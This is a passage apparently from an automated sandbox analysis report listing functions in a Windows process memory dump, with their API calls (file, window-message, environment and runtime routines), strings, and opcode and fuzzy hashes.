Opcode Fuzzy Hash: 7e9601d2247a13adf5892490d0984888a090eff7ba9d3fa4ff308a8b8e371313
Instruction Fuzzy Hash: 8B419121A096C689EB149FB5D4642B963B1FF44BA6F144634EBADC7BD5DF3CE1818300

Function 00007FF6CCCBF414 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF6CCCBF536

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
Instruction ID: 8b779287757f789fee15faa2618162bc1e0b0f8bfc3c9ac7b0fc1461af123ac6
Opcode Fuzzy Hash: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
Instruction Fuzzy Hash: FF410426B09AC281FA15DF92A92067663B5BF54BE2F094535DF9DCBB84EF3CE4458300

Function 00007FF6CCCC56D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMON

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF6CCCC56FF
_set_statfp.LIBCMT ref: 00007FF6CCCC571A
_set_statfp.LIBCMT ref: 00007FF6CCCC5736
_set_statfp.LIBCMT ref: 00007FF6CCCC5772

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
Instruction ID: 0afa0bcc324a208af7361dd1b6a386f56b8b88342a899e5a04013dcc09a7d933
Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
Instruction Fuzzy Hash: EB11E776E2CB8781F6547928E5453790D61AF543B2F484234EBFDC65D6CE2CE4D06305

Function 00007FF6CCCAFE24 Relevance: 7.5, APIs: 5, Instructions: 29windowsynchronizationCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32 ref: 00007FF6CCCAFE41
GetMessageW.USER32 ref: 00007FF6CCCAFE58
TranslateMessage.USER32 ref: 00007FF6CCCAFE63
DispatchMessageW.USER32 ref: 00007FF6CCCAFE6E
WaitForSingleObject.KERNEL32 ref: 00007FF6CCCAFE7C

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: Message$DispatchObjectPeekSingleTranslateWait
String ID:
API String ID: 3621893840-0
Opcode ID: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
Instruction ID: 146ae9bb675126284453c624e0014909e79b85f868013901d2aa66e218d67fd3
Opcode Fuzzy Hash: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
Instruction Fuzzy Hash: 7FF01221B3858683FB509F20E499B762271FFE5B46F441438E78EC1995DE3CD589CB50

Function 00007FF6CCCB625C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6CCCB6286
abort.LIBCMT ref: 00007FF6CCCB64EA

Strings

csm, xrefs: 00007FF6CCCB641A
csm, xrefs: 00007FF6CCCB62AB

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: __except_validate_context_recordabort
String ID: csm$csm
API String ID: 746414643-3733052814
Opcode ID: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
Instruction ID: 53edc45b167a6f86318bf463a2fe8cee3eb425d244a5a30b73cfcbda3893298c
Opcode Fuzzy Hash: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
Instruction Fuzzy Hash: E5718272608AD186DB688F65D06077DBBB0EB05B8AF148135DB8C87B85CF3CD495CB41

Function 00007FF6CCCB80F4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CCCB811B
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CCCB82ED

Strings

, xrefs: 00007FF6CCCB8276
*, xrefs: 00007FF6CCCB8221

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: _invalid_parameter_noinfo
String ID: $*
API String ID: 3215553584-3982473090
Opcode ID: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
Instruction ID: 05a59a668b0a5d4320b4106a5ee4c7cc94aecc0ec1a83d0ff645a307ab404160
Opcode Fuzzy Hash: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
Instruction Fuzzy Hash: 7D513372D0DE828AE7658EA884A537C3BB1EB15B1AF151135C7CEC529ACF3CD481D706

Function 00007FF6CCCC1758 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF6CCCC17CB
MultiByteToWideChar.KERNEL32 ref: 00007FF6CCCC1894
GetStringTypeW.KERNEL32 ref: 00007FF6CCCC18AE

Strings

$%s, xrefs: 00007FF6CCCC175A

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: ByteCharMultiWide$StringType
String ID: $%s
API String ID: 3586891840-3791308623
Opcode ID: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
Instruction ID: b494a596a0cedd29b3b3d7bce04370cc064937aa7f4ac217fa3d9bada5e5d237
Opcode Fuzzy Hash: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
Instruction Fuzzy Hash: C5419132B18BC18AEB619F66D8402A963A1FF44BA9F494235DF9D87BC5DF3CE5458300

Function 00007FF6CCCB66A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6CCCB5210: abort.LIBCMT ref: 00007FF6CCCB5223

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6CCCB674A
_CreateFrameInfo.LIBVCRUNTIME ref: 00007FF6CCCB6776

Strings

csm, xrefs: 00007FF6CCCB6876

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: CreateFrameInfo__except_validate_context_recordabort
String ID: csm
API String ID: 2466640111-1018135373
Opcode ID: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
Instruction ID: 589e2d1ec0fe3d1b874724a91acebfee86f6b5ce034772893d15e39fa0ae4a82
Opcode Fuzzy Hash: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
Instruction Fuzzy Hash: 85515A72A19B8287D624AF96E05126E77B4FB88B91F040134EBCD87B55CF38E460CB01

Function 00007FF6CCCC4360 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00007FF6CCCC4446
WriteFile.KERNEL32 ref: 00007FF6CCCC4479
GetLastError.KERNEL32 ref: 00007FF6CCCC449B

Strings

U, xrefs: 00007FF6CCCC4424

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: ByteCharErrorFileLastMultiWideWrite
String ID: U
API String ID: 2456169464-4171548499
Opcode ID: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
Instruction ID: 19aa8a5f281a0f824112bd499c04207a293c1b60216cc0fddac78c212bce809f
Opcode Fuzzy Hash: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
Instruction Fuzzy Hash: 3F418022A19A8182EB20DF65E8443BA77A1FB98795F548131EF8DC7B98DF7CD441C740

Function 00007FF6CCCA90B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF6CCCA90D9
GetObjectW.GDI32 ref: 00007FF6CCCA9107
ReleaseDC.USER32 ref: 00007FF6CCCA91BB

Strings

, xrefs: 00007FF6CCCA9153

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: ObjectRelease
String ID:
API String ID: 1429681911-3916222277
Opcode ID: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
Instruction ID: edaa6ac4440c6ace5d5f2ca2893e50c7feb85c7fe40aada0d1f592a8568a3bef
Opcode Fuzzy Hash: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
Instruction Fuzzy Hash: 9E31EA3561878187EB14DF12B81962AB771F78AFD2F50443DEE8A87B58CE3CD4499B40

Function 00007FF6CCC9E870 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(?,?,?,00007FF6CCCA317F,?,?,00001000,00007FF6CCC8E51D), ref: 00007FF6CCC9E8BB
CreateSemaphoreW.KERNEL32(?,?,?,00007FF6CCCA317F,?,?,00001000,00007FF6CCC8E51D), ref: 00007FF6CCC9E8CB
CreateEventW.KERNEL32(?,?,?,00007FF6CCCA317F,?,?,00001000,00007FF6CCC8E51D), ref: 00007FF6CCC9E8E4

Strings

Thread pool initialization failed., xrefs: 00007FF6CCC9E900

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
Instruction ID: e2efab6e3d0d1ade1a9e832cb9b341cb520c7b620b7398344b7fb147643d94e1
Opcode Fuzzy Hash: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
Instruction Fuzzy Hash: DE21B732E1568286F7509F64D4547AE32F2EB94B0EF188038CB8D8A295CF7E9856C784

Function 00007FF6CCCA85E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF6CCCA85EC
GetDeviceCaps.GDI32 ref: 00007FF6CCCA85FD
ReleaseDC.USER32 ref: 00007FF6CCCA860A

Strings

, xrefs: 00007FF6CCCA8610

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: CapsDeviceRelease
String ID:
API String ID: 127614599-3916222277
Opcode ID: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
Instruction ID: 7ebc4ab020d284a7066b2b3323372f1ad41d8eacbefecbb93aed2b4ab9f43feb
Opcode Fuzzy Hash: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
Instruction Fuzzy Hash: 20E08C21B0868183EB085FB6B58A02A2261AB4CBD1F15803DDA5A87798CE3CC4854300

Function 00007FF6CCC8D1A8 Relevance: 6.2, APIs: 4, Instructions: 238timeCOMMON

Download Yara Rule

APIs

SetFileTime.KERNEL32 ref: 00007FF6CCC8D46C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC8D554
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC8D55A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC8D560

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: _invalid_parameter_noinfo_noreturn$FileTime
String ID:
API String ID: 1137671866-0
Opcode ID: 3e0de6b87fc756f79ac571a371d77b74ab10159eff9a06e36aa9ff194842a8ae
Instruction ID: 397e3f60bf95d7e0f5218e5e81d34193e95b49c9749f6f30d891cca5485f402b
Opcode Fuzzy Hash: 3e0de6b87fc756f79ac571a371d77b74ab10159eff9a06e36aa9ff194842a8ae
Instruction Fuzzy Hash: A5A1C062A18AC281EA10DF65E8445EE6371FF8579AF405232EBDD87AE9DF3CE544C700

Function 00007FF6CCCA0548 Relevance: 6.1, APIs: 4, Instructions: 122COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF6CCCA05FC
SetLastError.KERNEL32 ref: 00007FF6CCCA0697

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 542e5569473ef3da8fe1ce605206685b94c807f809cd942946f4ed9f56b8a8e3
Instruction ID: b4bb1b0688ebb5c5e4f60ec85b4bb3b1425c7bd0a45f87ec02b8e70c6f857ddf
Opcode Fuzzy Hash: 542e5569473ef3da8fe1ce605206685b94c807f809cd942946f4ed9f56b8a8e3
Instruction Fuzzy Hash: 0C51BF72F14A8295FB00AF64D4592ED2371EB85BDAF404232DB9D97BEAEE2CD145C340

Function 00007FF6CCCA9D90 Relevance: 6.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF6CCCA9DBC
GetLastError.KERNEL32 ref: 00007FF6CCCA9E08
CreateDirectoryW.KERNEL32 ref: 00007FF6CCCA9F10
LocalFree.KERNEL32 ref: 00007FF6CCCA9F20

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
String ID:
API String ID: 1077098981-0
Opcode ID: decc2da6846149065e747433b686ffe20880dedc2611ac47de6390cb5f5191d4
Instruction ID: 9ef57e73cf8d73c45324194f270c2dde51c08c09d2f42e4897690ffc38b55a55
Opcode Fuzzy Hash: decc2da6846149065e747433b686ffe20880dedc2611ac47de6390cb5f5191d4
Instruction Fuzzy Hash: BD517332618B8286EB50CF61E8453AE7774FB89B85F501039EB8D97A58DF3CD545CB40

Function 00007FF6CCCBDB5C Relevance: 6.1, APIs: 4, Instructions: 104COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CCCBDBAF
WideCharToMultiByte.KERNEL32 ref: 00007FF6CCCBDC81
GetLastError.KERNEL32 ref: 00007FF6CCCBDCA4
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CCCBDCD6

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
String ID:
API String ID: 4141327611-0
Opcode ID: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
Instruction ID: e1a67851f6f2838858cf23c218276278709e286fba2460bdc0bf5ed53b45f60c
Opcode Fuzzy Hash: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
Instruction Fuzzy Hash: EB416E32E086C246FB659E949160379A7B0EF94B92F1481F1DBDD86A9EDF7CE8418700

Function 00007FF6CCC93980 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON

Download Yara Rule

APIs

MoveFileW.KERNEL32 ref: 00007FF6CCC939BD
MoveFileW.KERNEL32 ref: 00007FF6CCC93A34
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC93AEB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC93AF1

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: FileMove_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3823481717-0
Opcode ID: 2b6e6cda77fd8470acf22c2ab4e7c3ce966b7b843ddf4af9049b565a023b9c35
Instruction ID: 290ca6ea05dd795a7aca87e96f96b36e53596ac043d2f8052678a0670a9c94b5
Opcode Fuzzy Hash: 2b6e6cda77fd8470acf22c2ab4e7c3ce966b7b843ddf4af9049b565a023b9c35
Instruction Fuzzy Hash: 2C41B162F14B9184FB00CFB5D8851AC6375BF44BA9B085231DFADA7A99DF38D481C300

Function 00007FF6CCCC0B78 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6CCCBC45B), ref: 00007FF6CCCC0B91
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6CCCBC45B), ref: 00007FF6CCCC0BF3
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6CCCBC45B), ref: 00007FF6CCCC0C2D
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6CCCBC45B), ref: 00007FF6CCCC0C57

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$Free
String ID:
API String ID: 1557788787-0
Opcode ID: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
Instruction ID: 64873a7d7d801df99559bd9d1ba496a0c174002bf3d3e64a62842d6727e59806
Opcode Fuzzy Hash: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
